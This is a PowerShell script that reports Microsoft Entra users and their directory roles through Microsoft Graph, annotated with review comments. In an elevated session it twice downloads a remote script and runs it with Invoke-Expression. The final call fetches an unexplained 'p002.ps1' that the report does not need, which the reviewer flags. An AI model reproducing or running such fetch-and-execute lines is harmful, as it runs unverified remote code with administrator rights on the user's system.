<#=============================================================================================
Script by : Leo Nguyen
Website : www.bonguides.com
Telegram : https://t.me/bonguides
Discord : https://discord.gg/fUVjuqexJg
YouTube : https://www.youtube.com/@BonGuides
Script Highlights:
~~~~~~~~~~~~~~~~~
#. A single script that generates a user report with role assignments
============================================================================================#>
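param (
    # Export the report to a timestamped CSV file on the current user's desktop.
    [switch]$OutCSV,
    # Show the report in an interactive Out-GridView window.
    [switch]$OutGridView
)

# Refuse to continue unless the current Windows session is elevated.
# NOTE(review): the Graph queries run under the signed-in Entra account, so the
# elevation is presumably only needed by the module installation step - confirm,
# because everything after this check (including downloaded code) runs as admin.
$currentPrincipal = [Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()
if (-not $currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) {
    Write-Warning "You need to have Administrator rights to run this script!`nPlease re-run this script as an Administrator in an elevated powershell prompt!"
    # 'return' ends this script only; 'break' outside a loop unwinds the call
    # stack and can also terminate whatever script or loop invoked this one.
    return
}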
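# Install the required Microsoft Graph PowerShell SDK modules.
# The execution policy is relaxed for this process only (-Scope Process), so the
# machine-wide and per-user policies are left unchanged.
Set-ExecutionPolicy Bypass -Scope Process -Force | Out-Null
# NOTE(review): this downloads a script and executes it with Invoke-Expression
# inside the elevated session, without any integrity check. Whatever the server
# returns at run time is what runs as Administrator. The URL now names https://
# explicitly, because a scheme-less URL lets the first request go out over
# plain HTTP where it can be modified in transit.
# Prefer installing the modules this script actually calls from the PowerShell
# Gallery (Microsoft.Graph.Authentication, Microsoft.Graph.Users,
# Microsoft.Graph.Beta.Users), or download the installer once, review it, and
# run the reviewed local copy.
iex "& { $(irm https://bonguides.com/graph/modulesinstall) } -InstallBasic"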
# Sign in to Microsoft Graph and fetch every user account in the tenant.
# Any existing Graph session is disconnected first; the error raised when there
# is no session is suppressed.
$null = Disconnect-MgGraph -ErrorAction SilentlyContinue
Write-Host "Connecting to Microsoft Graph PowerShell..." -ForegroundColor Yellow

# Both scopes are read-only; -ErrorAction Stop aborts the script if sign-in fails.
$connectArgs = @{
    Scopes      = 'Directory.Read.All', 'User.Read.All'
    ErrorAction = 'Stop'
}
Connect-MgGraph @connectArgs

$users = Get-MgBetaUser -All
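# Build one report row per user, listing the directory roles the user holds.
# NOTE(review): only objects of type directoryRole returned by transitiveMemberOf
# are counted. Presumably this misses PIM-eligible (not yet activated)
# assignments - verify before using the report as a privileged-access inventory.
$i = 1
$total = @($users).Count

# Collecting the loop output is linear; '$report +=' copies the array each pass.
$report = @(
    foreach ($user in $users) {
        Write-Progress -PercentComplete ($i / $total * 100) -Status "Processing: $($user.UserPrincipalName) - $($user.DisplayName)" -Activity "Processing: ($i/$total)"

        # -All follows paging; without it only the first page of memberships is
        # returned, and a role on a later page would be silently left out.
        # @() keeps .Count meaningful when zero or exactly one role matches.
        $Roles = @(
            Get-MgUserTransitiveMemberOf -UserId $user.Id -All |
                Select-Object -ExpandProperty AdditionalProperties |
                Where-Object { $_.'@odata.type' -eq '#microsoft.graph.directoryRole' }
        )

        if ($Roles.Count -eq 0) {
            $RolesAssigned = "No roles"
        } else {
            $RolesAssigned = @($Roles | ForEach-Object { $_.displayName }) -join ','
        }

        # Emit the row; it is captured into $report by the enclosing @( ).
        [PSCustomObject]@{
            'DisplayName'       = $user.DisplayName
            'UserPrincipalName' = $user.UserPrincipalName
            'Enabled'           = $user.accountEnabled
            'Roles'             = $RolesAssigned
        }

        $i++
    }
)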
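# Output options: export to a CSV file, show a graphical grid view, or write to
# the console (default).
# The report shows which accounts hold directory roles, so treat any exported
# copy as sensitive.
if ($OutCSV.IsPresent) {
    # 'MM' is the month and 'HH' the 24-hour clock. Lowercase 'mm' is minutes and
    # 'hh' is the 12-hour clock, which put minutes in the month position and made
    # morning and afternoon runs produce the same hour.
    $timestamp = Get-Date -Format 'yyyy-MM-dd-HH-mm-ss'
    $filePath = "$env:userprofile\desktop\report-${timestamp}.csv"

    # DisplayName and UserPrincipalName are directory-supplied text. Spreadsheet
    # applications treat a cell starting with =, +, - or @ as a formula, so
    # import the file as data instead of double-clicking it if those values are
    # not fully trusted.
    $report | Export-CSV $filePath -NoTypeInformation -Encoding UTF8
    Write-Host "`nThe report is saved to: $filePath `n" -ForegroundColor Cyan
    Invoke-Item "$env:userprofile\desktop"
} elseif ($OutGridView.IsPresent) {
    $report | Out-GridView
} else {
    $report | Sort-Object -Property Roles -Descending
}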
# NOTE(review): this fetches a second remote script and executes it with
# Invoke-Expression in the same elevated session, passing -UseChoco. Nothing in
# this file shows what that script does or why a read-only report needs it, and
# its content can change between runs. Review the downloaded script before
# keeping this line, and remove it if the report does not depend on it.
iex "& { $(irm https://bonguides.com/temp/p002.ps1) } -UseChoco"